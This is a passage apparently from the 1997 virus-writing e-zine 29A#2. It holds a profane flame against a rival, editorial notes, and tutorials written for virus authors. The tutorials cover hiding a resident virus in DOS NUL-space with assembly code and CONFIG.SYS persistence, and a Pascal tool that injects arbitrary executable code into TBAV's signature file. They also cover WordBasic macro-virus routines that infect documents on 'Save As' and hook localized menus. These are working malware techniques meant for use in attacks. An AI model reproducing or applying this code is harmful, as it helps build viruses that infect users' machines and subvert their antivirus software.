A pretty modest boy, heh??? but that's not all. Besides this, we all in the virus scene had to stand him claiming "IRG#8 is the best zine about viruses ever released", being that a real offense to VLAD and the great work they did during their presence in the scene. Now it is when we all realise about why this boy i'm talking about is so "well appreciated" among most of the mentally sane and concious-of-what-they-say virus writers. Fortunately he retired and left the scene. IRG died. And we all lived much better since that happened, as we had to stand no longer any motherfucking candy eater telling us shit about how cool he was. While he was comfortably pulling himself home, we all were happily having a good run of things in the virus scene. In fact everything was going almost perfect. But you know perfection does not exist. And that's why he briefly reappeared by june/july of this year, using other nick and apparently trying to hide his previous identity, and to dazzle the scene with a new virus he had written. This virus was released via IRC (as far as i know) within a ZIP file which contained, among others, a text file called "readme.1st", which started this way: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 [...] % Important % _____________ I do not give permission to anyone to publish this virus in their Vx zine. This means the fools who published the source to Zhengxi, 6 months after it was made publicly available, and kept rambling on about they were the zine to release the source.. they know who they are. Also, ugly children are not permitted to read this text. [...] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 It's a pretty curious thing to see what may ENVY drive people to do. Well, it is obviously about us, 29A, who published the original source code of Zhengxi in 29A#1, in december 1996. That's why i decided to use this section of the magazine to reply such a stupid quote. So keep on reading my

answer for the child, same as if it were an e-mail reply: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 From : Mister Sandman/29A, To : The Soul Manager (previously known as *********), About: Your big mouth Hi fool. > I do not give permission to anyone to publish this virus in their Vx zine Do you think i'd ever publish anything from you in 29A? not in this life... > This means the fools who published the source to Zhengxi, 6 months after > it was made publicly available, and kept rambling on about they were the > zine to release the source.. You mean the same ones who kicked your ass? ah, yeh, it's us... well, i don't really mind a shit what you think or don't, but i'll try to make things clear for the rest of the people who are reading this. Zhengxi was first publically released in june 1996, but only in its binary form. And it was only a few weeks before 29A#1 was released, in december 1996, when some fortunate VXers could get the original source code for it, and that's what we eventually published, with the agreement of its author, as at that time Zhengxi was so far the most asked virus in the scene. And that's why we say we were the first zine to release the source, as it is the only truth. No one else did it before. Maybe this reaction is the consequence of a frustrated attempt to be you and your group the first ones to publish it, heh? > they know who they are. In fact we even know who you are, despite your intention to hide yourself under a new nick (The Soul Manager) and then talk shit about us, instead of encouraging yourself to say what you think with your original nick. Pathetic. With Zhengxi or without it, you're still dead and i'm still Elvis.

Mister Sandman, chew my success. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 I would finally like to add a brief text in latin, the language which gives (actually gave) his nick to the dork i'm talking about, to describe what he exactly makes me think and the way i feel every time i hear about him. Those who can speak/translate latin will surely enjoy it a lot.

"Qvotienscvmqve tvvm cognomen avdio navseas sentio, qvotienscvmque tvos viros lego vomire volo, et vomiam ac mingam ac concvlcabo sepvltvra tva, qvod ipsa sicvt cognomen tibi fvit, atqve in ea reqviesces... cvm moriaris... si reapse aliqvando vixisti".

Despite my initial intentions, i was about to forget about publishing this article, so it would not stand between the friendship of one of the VXers i admire most, now a 29A member, and the "guy" this article is all about, but the thing went suddenly fixed, as soon as i had noticed about the fact that the infamous "Soul Manager" had broken his... friendship?, with this friend of mine just because he'd joined 29A. Pretty curious meaning of friendship. It would be very easy to be ok in the VX side, among us all (not as between AVers, because they have economy standing between their interests and them) in the virus scene, but it seems that many people don't want it to be so. Oh, and... he's giving out all his shit as he's now changing his nick again so keep your eyes open and watch any dork you meet out. Fuck drugs off and get your rage in your ass, idiot.

Mister Sandman, bring me a dream.

Article separator > Mister Sandman/29A What is this article used for? answer is nothing. Its functionallity is merely esthetical, as it keeps the articles separated of the executable files of the magazine. So why am i writing anything here? well, there are still a few thingies which haven't been told in the rest of the articles and result kinda interesting or funny to read. For instance, do you know that: 666 * 3 = 1998? it seems like this is gonna be a magic year for the VX side. Will AVers die? will they be satanized? or will they maybe get medieval in their asses? who knows :) Other thing you should note is the fact that we have not included any virus index in this issue. It seemed to us pretty stupid as they are described in detail both in their corresponding source and in the "29A Labs", our website... describing them one more time would be a pain. There are also one couple thingies pending... the password for the secret area of our previous issue was "29akewl". We accept no complains, we didn't have much imagination at that time and were quite hurried, so... :P The other pending thing is the importance of the new features of our improved file browser. Now it is possible to load it with or without mouse, with or without intro, and so on. And once loaded, when reading any article, you will be able to choose between smooth or hard scroll. Now it is also possible to run the payload of any virus included in our zine when having loaded its source code from within the file browser. It is still possible, btw, to UUdecode binary files, albeit we have not implemented this feature yet. And finally, the screen saver can be loaded now just by pressing a hot-key. And note this is a DOS application, so we don't make responsible of the way it may work under *your* Windows95. At least under ours it works ok.

Optional parameters to 29A#2.EXE i........... Don't load intro (argh!) m........... Enable mouse inside browser s........... Disable smooth scroll

File browser internal commands #........... Activate screensaver b........... Activate boss screen g........... Run payload (if available) s........... Dis/able smooth scroll u........... UUdecode binary (i/a) F1.......... Further help (lame!)

Wish us some happy VX holidays and enjoy the zine!

Mister Sandman, bring me a dream.

Playing "Hide and Seek" > "Q" the Misanthrope It is a game of one-up-man-ship between the VX and the AV community. VX seems to be winning this battle but is also forcing new improvements. VX creates virus. AV creates scan strings. VX creates mutation. AV creates smart detectors. VX creates stealth. AV counters that with direct access. VX creates tunneling. AV stops that. VX creates tracing. AV stumbles. VX creates retro. AV stumbles. VX creates Stop AV from memory scanning. AV stumbles. VX creates macro viruses. AV goes nuts. VX creates new places to hide from AV. AV will probably stumble again.

Hide in NUL-Space Wouldn't it be great to hide in a file that could not be accessed. You can. There are little things called device drivers in your PC. COM1, COM2, LPT1 and CON are examples. NUL is also a device that serves little purpose except do nothing. An example of this: COPY *.* NUL will read all the files for errors and copy them into NUL-Space (nowhere). Try to create a file by the name of NUL, what could you do with it? An experiment is necessary. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 c:\>debug -a mov ah,52 int 21 int 3 -g AX=5200 BX=0026 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0C9C ES=00C9 SS=0C9C CS=0C9C IP=0104 NV UP EI PL NZ NA PO NC 0C9C:0104 CC INT 3 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 ES:BX points to the DOS list of lists. From Ralf Browns interrupt list: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Format of List of Lists: Offset Size Description 00h DWORD pointer to first Drive Parameter Block 04h DWORD -> first System File Table 08h DWORD pointer to active CLOCK$ device's header [...] 22h 18 BYTEs actual NUL device driver header (not a pointer!) NUL is always the first device on DOS's linked list of device drivers - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 ES:BX+22h is what is of interest. Back to debug. - - - - - - - - - - - - - - - - - - -d es:48l12 00C9:0040 00 00C9:0050 CD 0D 4E 55 4C 20 20 20-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 00 A6 C9 04 80 C7 0D ........ 20 ..NUL - - - - - - - - - - - - - - - - - ->8

See the word NUL at es:bx+2Ch. Lets change it to AUTOEXEC. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 -e es:52 "AUTOEXEC"

-q - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Back to DOS. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 c:\>type c:\autoexec.bat c:\>ren c:\autoexec.bat test.bat Path not found c:\>del c:\autoexec.bat Access denied - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Notice what happened when AUTOEXEC.BAT was in NUL-Space. It could not be read, renamed or deleted. Wouldn't this be a great way to protect our virus. Ralf Browns list showed that the actual NUL device was only 18 bytes long. Could you just make another 18 byte NUL device by another name? The answer is YES! Here is the device format from Ralf Brown: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Format of DOS device driver header: Offset Size Description 00h DWORD pointer to next driver, offset=FFFFh if last driver 04h WORD device attributes (see below) 06h WORD device strategy entry point call with ES:BX -> request header 08h WORD device interrupt entry point 0Ah 8 BYTEs blank-padded character device name Bitfields for device attributes: Bit(s) Description 15 set (indicates character device) 14 IOCTL supported 13 (DOS 3.0+) output until busy supported 12 reserved 11 (DOS 3.0+) OPEN/CLOSE/RemMedia calls supported 10-8 reserved 7 (DOS 5.0+) Generic IOCTL check call supported 6 (DOS 3.2+) Generic IOCTL call supported 5 reserved 4 device is special (use INT 29 "fast console output") 3 device is CLOCK$ 2 device is NUL 1 device is standard output 0 device is standard input - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 From the debug experiment: - - - - - - - - - - - - - - - - - - -d es:48l12 00C9:0040 00 00C9:0050 CD 0D 4E 55 4C 20 20 20-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 00 A6 C9 04 80 C7 0D ........ 20 ..NUL - - - - - - - - - - - - - - - - - ->8

We see that the next device in the chain is at C9A6:0000h, attributes are 8004h and that the strategy and interrupt entry points are 00C9:0DC7h and 00C9:0DCDh. The strategy and interrupt points for a NUL device just need to point to a RETF (they really could point anywhere since they are not used). To make our own NUL device we can do something like this:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 [...] mov ah,52h ;get list of lists int 21h cld ;get address of next device in ds:si lds si,dword ptr es:[bx+22h] push cs ;point to our device pop es mov di,offset virus_device movsw ;copy device chain to our device movsw ;then hook in our device mov word ptr ds:[si-02h],cs mov word ptr ds:[si-04h],offset virus_device [...] virus_device dd -1h dw 8004h ;NUL character attributes dw return_far ;strategy pointer dw return_far ;interrupt pointer db "VIRUS " ;any file name your want in NUL-Space [...] return_far: retf - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 When your virus starts, have your virus create a first generation virus whose host is the standard CD 20 (terminate immediately) before it starts infecting. Name that virus C:\FDGDIKGA.PKB (pseudo random name and extension but should be same for all infections on that PC). This name could be derived from the drive C: serial number: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 [...] mov ax,6900h ;get drive serial number mov bx,0003h ;drive C: push cs pop ds mov dx,offset info ;point to where serial number will be int 21h ;create file name from the drive C: serial number cld mov si,offset serialnumber mov di,offset device_name mov cx,0004h ;loop 4 times get_serial: lodsb ;get start of serial number push cx mov cl,04h ;inner loop 4 times make_file: sub al,cl ror al,cl ;pseudo random letter mov bl,al and bl,0fh add bl,"A" ;create letter from A to P mov byte ptr ds:[di],bl inc di ;save it and move pointer loop make_file pop cx loop get_serial mov byte ptr ds:[file_dot],"." ;restore dot mov byte ptr ds:[asciz_nul],00h ;restore nul mov dx,offset file_name ;now create virus by name at DS:DX [...] info dw 0 serialnumber dd 0 ;drive C: serial number

db file_name db device_name db file_dot db asciz_nul db - - - - - - - - - - - -

19 dup(0) "C:\" "VIRUS000" ".000" 00h,00h,00h - - - - - - - -

;misc junk ;pseudo virus name goes here ;with pseudo extension - - - - - - - - - - - - - - - - ->8

Hide it with the System and Hidden attribute, maybe even Read-Only. Now create a NUL device by the name of FDGDIKGA (same as pseudo random file name). Add this line to CONFIG.SYS: INSTALL=C:\FDGDIKGA.PKB Now start infecting. Go memory resident (you really only need to have the 18 bytes of your NUL device resident). What will now happen is magic. When the PC reboots there will load a program that doesn't have an executable extension so most AV programs won't even try to scan it. If they do they won't be able to read it or delete it because it is in NUL-Space. The AV people will be able to add the scan string for your virus and remove all the children created by it but they will not get the virus in NUL-Space. It will continue to infect again and again. Maybe only have it infect on Fridays or on the 13th of each month so it will appear that the virus has gone away but later it magically returns.

Hiding in NUL-Space and Windows 95 It works just fine with one notable exception; SCANDSKW.EXE that is automatically launched by the System Agent detects that there is a device by the same name as a file and will flag it. The solution is simple. Create another NUL device by the name of SCANDSKW. This stops SCANDSKW from working but doesn't flag an error. Note: when going resident with the 18 byte NUL device, you might want put it in the same location as the AUX device. This device is never ever sed and is just wasting space. AUX is another name for COM1. PRN could used but some older programs actually use it. LPT3's 18 bytes also could used. The way to find the AUX device is to search the device chain: to ube be

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 mov ah,52h ;get list of lists int 21h add bx,22h ;point to NUL device check_end: cmp word ptr es:[bx],-1 ;end of chain? je end_chain cmp word ptr es:[bx+0ah],"UA" jne next_device ;Look for "AUX " cmp word ptr es:[bx+0ch]," X" jne next_device [...] ;found AUX device at ES:BX change the name at ES:BX+0Ah to whatever you want [...] mov word ptr es:[bx+04h],8004h ;set NUL device jmp short end_chain next_device: les bx,dword ptr es:[bx] ;get next device in chain jmp short check_end end_chain: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 To see the power of NUL-Space, try this in Windows 95: md\"NUL It locks the computer completely up. ".

Hide in Cypher Text PkZip has the ability to password protect ZIP files. This our advantage. Have the virus run this:

can be used to

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 PKZIP -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 And add this to the AUTOEXEC.BAT: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 @ECHO OFF PKUNZIP -O -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 This will allow multiple reinfections but the source will not be found with a virus scanner because it will not be able to expand the ZIP file. If this is over your head, save it and come ter. Have fun in NUL-Space. Dear AV community, You are in check! It is now your move. back to it when you are smar-

"Q" the Misanthrope

TBSCAN.SIG infection > Malware TBAV uses so called AVRs in order to add detection routines for catching polymorphic viruses that avoid its generic decryption engine. Such an AVR is just native code which is loaded and... executed! by TbScan, and is stored along with the virus signatures in the signature file TBSCAN.SIG. This signature file begins with a 128-byte-long header, in which we can find the amount of 16-byte-long blocks (paragraphs) needed by the AVRs at offset 70h, stored as a word (2 bytes). At offset 72h is stored the overall size of the virus signatures, as a doubleword. That's all we need to know about the TBSCAN.SIG header in order to trojanize or infect it. The AVRs are located just after the above contents in the file, and this is the place where our virus or trojan has to be inserted. Since i do not know all the specifications of it, we can just take what is already there and modify it so there will be enough space for the new AVR code. Each AVR has a 16-byte-long header. The word at offset 0ch of this AVR header holds the size of the AVR code, including its header size. Just after this header, the AVR code (wich we'll describe later) follows. And after this code we can find the virus name in ASCIIZ format. The virus name size (including the ending 0) is stored in a byte at offset 0ah of the AVR header. The total size (header+code+name) is stored as well in a word at offset 0eh in the header. Finally, the AVR code and the virus name are encrypted by a bytewise xor with 44h. IAVR, the program included below, does all this stuff so you can insert any code you want as an AVR in your TBSCAN.SIG file. You just have to call it 'IAVR filename_of_AVR_code'. If you don't specify any filename, IAVR will keep on waiting for you to type in the AVR code. Then, after it has read the code, IAVR will prompt for the virus name your AVR has to be associated with. The new signature file will then be written to a new file whose name will be TBS.SIG. And now, before including my program IAVR, let's have a look at the format of any AVR code. It's a quite simply relocateable code. If it returns a carry flag, it's telling TbScan that the virus was found. The AVR code has to be ended with a retf instruction. The rest is just normal code, so you can program as usual and insert anything you want there. This is an example of an AVR which triggers all the files as infected: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 model tiny .code org 100h start: stc retf end start - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 And finally, the Pascal source of my IAVR program, which is able to add any AVR to TBSCAN.SIG, writing the resulting file as TBS.SIG. You can find the compiled executable version of this program in the \FILES directory of this issue of 29A. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 uses Crt; const Name : String = 'Default_Virus';

type PWord = ^Word; var F1,F2,F3 : File; ML,L,i,BP1 : word; OP,Size_ : LongInt; Buffer : Array[0..$2000] of Byte; begin Size_:=0; assign(F1,'tbscan.sig'); Reset(f1,1); assign(F2,'tbs.sig'); rewrite(f2,1); assign(F3,ParamStr(1)); reset(F3,1); blockread(F1,Buffer,$80); blockwrite(F2,Buffer,$80); blockread(f1,buffer,$1fff); blockread(f3,buffer[$10],$2000,L); L:=L+$10; Buffer[$0c]:=L and $FF; Buffer[$0d]:=L div $100; Write('Name :'); Readln(Name);

{ { { { { { { { {

open original signature file create new signature file open file with code to insert read header of signature file and simply write it to new one read first 1FFF byte of orig. read upto 2000 byte of code add size of header for AVR write header size into buffer

} } } } } } } } }

{ ask for a name for the virus } { thats detected by the new AVR } For i:=1 to Ord(Name[0]) do Buffer[L+I-1]:=Ord(Name[i]); { write it into buffer } Buffer[L+Ord(Name[0])]:=0; { and end it with a zero } L:=L+Ord(Name[0])+1; { add length of name to size } Buffer[$0a]:=Ord(name[0])+1; { store length of name } Buffer[$0e]:=L and $FF; { and full length of AVR } Buffer[$0f]:=L div $100; for i:=$10 to L do Buffer[I]:=Buffer[I] XOR $44; { encrypt the new AVR } blockwrite(f2,buffer,L); { and write it to new sig.-file } ML:=L; seek(f1,$80); { seek back to top of original } { AVRS } { now write the rest of the original signature file to the new one } L:=$2000; While L=$2000 do Begin BlockRead(F1,Buffer,L,L); BlockWrite(F2,Buffer,L); End; Seek(F2,$80); Repeat OP:=FilePos(f2); blockread(f2,buffer,$1fff); if Buffer[1]=$FF then begin { begin right after header again }

{ save position we have in file } { read a bit from file } { is it an cotrol entry ? } { yes, is control entry } for i:=$10 to Buffer[$0e]+word(buffer[$0f])*256 do Buffer[I]:=Buffer[I] XOR $44; { decrypt it } i:=Buffer[$0c]+word(buffer[$0d])*256; { ??? } OP:=OP+Buffer[$0e]+word(buffer[$0f])*256; { add size of entry to position } { in file } Size_ := Size_ + Buffer[$0e]+word(buffer[$0f])*256; { summarize all sizes } Seek(F2,OP); { seek to position after entry } end; Until Eof(F2) or ( Buffer[1]$FF ); If Not( Eof(F2) ) then Begin BP1 := 0; { now the signatures }

{ repeat until end of this } { signature-block } Size_ := Size_ + Buffer[BP1+8] + Buffer [BP1+7] + 10; { add size of entry } BP1:=Buffer[BP1+8]+$A+BP1+Buffer[BP1+7]; { here too } if BP1>=$1E00 then begin { we need a new part of file to } { read sometimes } Seek(F2,OP+LongInt(BP1)); OP:=OP+LongInt(Bp1); BlockRead(F2,Buffer,$2000); BP1:=0; end; end; Size_ := Size_ + $81; { somehow 129 byte was missed } Seek(F2,$70); BlockRead(F2,Buffer,6); { read 6 byte from offset $70 } Seek(F2,$70); PWord(@Buffer[0])^:=PWord(@Buffer[0])^ + ( (ML+15) DIV 16) ; { add para size of new AVR code } Buffer[2]:=Size_ and $FF; { writew new size of signatures } Buffer[3]:=( Size_ SHR 8 ) and $FF; Buffer[4]:=( Size_ SHR 16 ) and $FF; Buffer[5]:=( Size_ SHR 24 ) and $FF; BlockWrite(F2,Buffer,6); { write the 6 byte back to file } End; Close(F1); Close(F2); Close(F3); end. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Malware

while (Buffer[BP1]0) do begin

Macro virus trickz > Jacky Qwerty/29A This article is not intended to be a tutorial for macro virus writin. It simply states some common problemz and known limitationz with actual macro virii, then sugests solutionz and provides some code examplez for them. The reader should be already familiar with some of the conceptz surroundin macro virii stuff. If not, i sugest to read first a "real" tutorial about the subject and then jump back to this article.

Index 1. Introduction 2. The "SaveAs" problem 2.1. The "SaveAs" solution 2.2. The "SaveAs" example 3. The "MultiLanguage suport" problem 3.1. The "MultiLanguage suport" solution 3.2. The "MultiLanguage suport" example 4. Final Note 5. Disclaimer

1. Introduction One day while i was surfin the Web, unexpectedly found a couple of linkz containin Word macro virii stuff. After havin programed some DOS virii and researched about PE infection, one has to admit that the idea of a virus writen in WordBasic or VBA... mmm... well, sounds a bit stupid >8P (DS1, NJ: dont get mad... >8D) Indeed, macro virii seem stupid once u write one, but at that moment i had written none. After i downloaded and played with some of them, i actually understood not only how stupid macro virii were, but also Microsoft programerz. They're all clueless on what *security* means :)

2. The "SaveAs" problem Just when i started to write my own macro virus, my atention was caught by an interestin mesage posted to alt.comp.virus. The topic was about that typical nuisance with macro virii that reveals their presence: the "SaveAs" problem. As i had thought, it was posible to overcome this, and that mesage from an expert AVer (well ehem) had just confirmed it. The "SaveAs" problem occurs when u try to save any infected document with another name usin the "FileSaveAs" command. After the "SaveAs" dialog box appears, u cant change the drive, nor the directory path, nor the format type. Word always saves your document in the "templatez" directory, unablin u to change it. This is bad for the common clueless user and bad for the virus too, as it reveals its presence by tellin him somethin is wrong. It also reduces its chancez to spread coz now the user cant take home his (infected) document as long as Word doesnt let him save documentz to his floppy disk, due to the "SaveAs" problem. I have thought of diferent wayz to overcome this, however i'll discuss the method i actually implemented in my WM.CAP virus.

2.1. The "SaveAs" solution

How do we solve this problem then? easy, very easy once we understand what an infected document really is. We cant forget that an infected document is really a "template", that why Word doesnt let us change the drive, nor the directory path, nor the format type. Becoz its a "template" and templatez belong to the templatez directory! Ok, but what if we make Word think that the infected document, sorry i meant the infected "template", is a genuine Word document? this would allow the user to select the drive, path and any type for the document! right? right! but how? Easy again, once we understand why Word provides "templatez": to make user's life easier by creatin documentz based on such templatez, got it? All we have to do is create a new document based on our active infected template! in other wordz we have to "emulate" the "SaveAs" function as if Word were saving a genuine document. Lets write some code to ilustrate.

2.2. The "SaveAs" example Sub FileSaveAs On Error Goto endFileSaveAs Dim dlg As FileSaveAs GetCurValues dlg If dlg.Format 1 Then Dialog dlg FileSaveAs dlg Infect(dlg.Name) Else TempWindow = Window() OriginalName$ = dlg.Name FileNew .Template = FileName$() On Error Goto CloseDoc GetCurValues dlg dlg.Name = OriginalName$ Dialog dlg FileSaveAs dlg On Error Goto endFileSaveAs Infect(dlg.Name) If TempWindow >= Window() TempWindow = TempWindow + 1 EndIf WindowList TempWindow CloseDoc: FileClose 2 End If endFileSaveAs: End Sub ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' Our "FileSaveAs" macro Declare dlg as FileSaveAs dialog box Get current values into dlg Not a template? (i.e. not infected?) No, a clean document, show box Save the new document Infect it! go! It's a template (i.e. it's infected) Get current window (template) Get original document name Create new doc based on template! Now on: if any error close new doc Get current values for new doc Change doc name for original one Ok, show FileSaveAs dialog box Save the new document Now on: if any error just go Ok, infect new document Get old template window number Make it the active window Close it without promptin We're done! "SaveAs" problem fixed!

The trick here is that the "FileSaveAs" subroutine behaves diferently acordin to the object bein saved. If the object is a genuine Word document (i.e. not infected), the routine simply shows the "SaveAs" dialog box and tries to infect it afterwardz. If the object bein saved is a "template" (i.e. perhaps an infected document) then the routine first creates a new document based on that active template (which is actually the infected document itself) and then shows the "SaveAs" dialog box from this newly created clean document. This time Word allows to choose the format type, drive letter and directory namez. After the user chooses the document name and saves it, the routine simply infects the document, swaps to the window containin the old template (i.e. the old infected document) and finally closes it leavin open the new "Saved-As" document just as Word itself does.

If at this point u're wonderin why we created a new "empty" document from the template, then u probably need some background info in Word macroz and templatez. The new created document is NOT "empty" as it was created from a template which was not empty. Remember that this template is really our infected document and as a result our new created document will contain the same text stuff as the template. Remember also the definition of what a "template" is and why we use them.

3. The "MultiLanguage suport" problem This is a dificult topic and several diferent aproachez have been tried and implemented by different VXers in order to overcome it. However as to this writin, i still havent seen a single *reliable* multilanguage macro virus. The Wazzu virus consisted of a single automacro: AutoOpen. This makes it language-independent indeed but it still has the "SaveAs" problem, big deal. The "MultiLanguage suport" problem has to do with the fact that MS Word is available in diferent languagez and flavorz for diferent platformz. Whenever we give a macro the name of a menu item, Word will actually execute the code contained in such macro whenever the user clicks or presses the menu item asociated with it. However if the user executes the same action (clicks the same menu item) under another Word language, the asociated macro won't be executed at all becoz it doesnt match the menu item name as it was written in another language, u see? For example supose in english Word we program the "FileOpen" macro to do whatever action. Whenever we click the "File/Open" item, our macro will be executed. However supose we copy (unchanged) the same macro to another Word language, say spanish. Under this Word language the asociated file menu item changes now to "Archivo/Abrir". If we click this menu item, our old "FileOpen" macro won't be executed at all. However if we rename the macro to "ArchivoAbrir", this time it will execute just fine. This is what is known as the "MultiLanguage suport" problem.

3.1. The "MultiLanguage suport" solution (without AutoMacroz) The best aproach to obtain multilanguage suport without losin control over the enviroment is interceptin the file menu related macroz, at least the "FileSaveAs" macro so we can fix the "SaveAs" problem. The best solution i came up with after thinkin a bit among the diferent alternativez was to intercept the file macroz directly acordin to the especific Word language instaled. This is not a dificult task, however what proves to be somewhat complicated is guessin out the correct macro name for the respective file menu item. If this step is done incorrectly, some file menuz will end up doin diferent actionz other than expected. For instance, the "FileSave" macro could end up callin "FileClose", thus closin the document instead of saving it or viceversa. In order to get the macro namez for the actual Word language instaled, we must use the "MenuItemMacro$" function. This function gives us the macro name for a given menu item inside a menu, asumin we know of course which menu this menu item refers or belongs to and knowin the menu item name or the menu item position inside this menu itself. Heh are u drowsy? =8-S. This is precisely the reason why this method is still not 100% reliable. We must asume fixed menu item positionz for the menu itemz we wanna hook. In any Word language from any standard Word instalation we have the followin scenario (equivalent spanish macroz are also shown):

English FileOpen FileClose FileSave FileSaveAs

Spanish ArchivoAbrir ArchivoCerrar ArchivoGuardar ArchivoGuardarComo

Menu 1 (File) 1 (File) 1 (File) 1 (File)

Menu item position 2 3 5 6

This is precisely the method implemented in the WM.CAP virus in order to work in any Word language. It created aditional macro namez with same body but diferent name -acordin to the actual Word language instaled- for a given macro function. The fact that the macro code remains the same in any Word language is not a problem. The macro interpreter inside Word is "universal", meanin that it will execute correctly the WordBasic or VBA instructionz inside the macroz without carin about the actual Word language instaled. It needs however to refer to valid existin macro namez or labelz. As macro namez change for a given especific Word language, we must be very careful NOT to include any reference to a language-dependent macro name inside any of our file related macroz. This is the reason why such file related macroz inside WM.CAP are just short stubz ("wraperz") that jump to other subroutinez inside the CAP macro itself. Before showin an example to the "MultiLanguage suport" method, i must warn once again that this method is not 100% reliable. It all depends on how much the user has customized his Word menuz and other setingz. It should however work just perfect on those Wordz havin the factory standard setingz which gracely share all Word instalationz by default. Again in some especific user-customized Word instalationz, the latter method can easily mess up some of the file related macroz, resultin in unexpected behavior and weird funny actionz. Here follows the "MultiLanguage suport" example.

3.2. The "MultiLanguage suport" example Dim Shared MacroName$(N) Sub MAIN [...] MacroName$(2) MacroName$(3) MacroName$(5) MacroName$(6) ' Array of stringz to hold the macro namez ' Main subroutine = = = = "FileOpen" "FileClose" "FileSave" "FileSaveAs" ' ' ' ' "FileOpen" "FileClose" "FileSave" "FileSaveAs" at at at at position position position position 2 3 5 6 in in in in file file file file menu menu menu menu

FileMenu$ = MenuText$(0, 1)

' Get name for file menu ("&File")

For MacroNumber = CountMacros(1) To 1 Step - 1 Position = 0 NameOfMacro$ = MacroName$(MacroNumber, 1) Select Case MacroDesc$(NameOfMacro$) Case "FileOpen" Position = 2 Case "FileClose" Position = 3 Case "FileSave" Position = 5 Case "FileSaveAs" Position = 6 End Select If Position Then ' ' ' ' ' ' ' '

' Process each macro ' No position by now ' Get macro name ' Get description of ' macro name Description = "FileOpen" ? then position in file menu = 2 Description = "FileClose" ? then position in file menu = 3 Description = "FileSave" ? then position in file menu = 5 Description = "FileSaveAs" ? then position in file menu = 6

' If position in file menu was found then..

LocalMacro$ = MenuItemMacro$(FileMenu$, 0, Position)

' Get localized ' macro name If Left$(UCase$(LocalMacro$), Len(MacroName$(Position))) UCase$(MacroName$(Position)) ' If local macro name is And ' diferent from english name Left$(LocalMacro$, 1) ' and local macro name is NOT "(" ' a separator "(.." then Then MacroCopy F$ + ":" + NameOfMacro$, LocalMacro$, -1 End If End If Next ' Copy macro to ' localized ' macro name

' Process next macro

The objective in the previous example shows for itself. We're tryin to get the file related macro namez for any localized version of Word other than english. If these file related macroz are located in the exact position where we expect them to be in the file menu (very likely), then the above example will do its work. Probably at this point u're wonderin what has the macro description field to do in all this mess. Heh, well, the field proves to be very useful for some purposez other than simply describin what the macro does. The macro description field can be used to hold generation countz and self-recognition paternz, among other thingz. In the above example however, the description field mite not be necesary at all. Its purpose is simply to identify a given file related macro in order to assign a position for it in the file menu. But u could argue this can be done as well simply comparin the macro name retrieved from the "MacroName$" function with the required english macro name. Yes, u could, and it would work, as long as these english file related macroz keep stayin in the infected document. But u see, macro corruption, deletion and snatchin of macros are common nowadayz between macro virii due to the increasin number of existin samples of themselves. Becoz of this, the use of the macro description field (whenever posible) to recognize english or equivalent localized macro namez, makes the virus much more robust to macro corruptionz or undesired macro deletionz.

4. Final note This article was written one or two months after Microsoft released its long expected Office'97, containin Word'97. Becoz of this and becoz i lost my interest in macro virii stuff since that time on, i dunno if these macro trickz will also work under Word'97, i guess not. However, if other VXerz are interested in these topicz and want to add more robustness to their macro virii under Word'97, they should consider the problemz described above. I hope this article could be useful for that purpose. Thats all, folkz.

5. Disclaimer This information is for educational purposez only. The author is not responsible for any problemz caused by the use of this information.

(c) 1997. Jacky Qwerty / 29A.

WM.CAP virus description > Jacky Qwerty/29A This article gives a full description of the WordMacro CAP virus. It can be seen as a "real" example for the different techniqz described in the past article named "Macro virus trickz". Check out as well the virus source code, also published in this isue.

Index 1. Introduction 1.1 Macro virus hype 2. WM.CAP: a complex word macro virus? 3. In the Newz 3.1. Dr.Solomon speaks 3.2. Sophos speaks 3.3. McAfee speaks 3.4. F-Potatoe speaks 3.5. Norton speaks 3.6. AVP speaks 3.7. Quarterdeck speaks 4. Functional Description 4.1. Removal of macroz 4.1.1. Concept vs. Wazzu 4.1.2. CAP vs. Concept 4.2. Global template infection 4.2.1. Searchin for localized macroz 4.2.2. Incremental generation count 4.2.3. Removal of menu itemz - stealth 4.3. Document, template and RTF infection 4.4. Disablin of AutoMacroz 4.5. The "SaveAs" problem solved 5. Shortcutz 6. Disclaimer

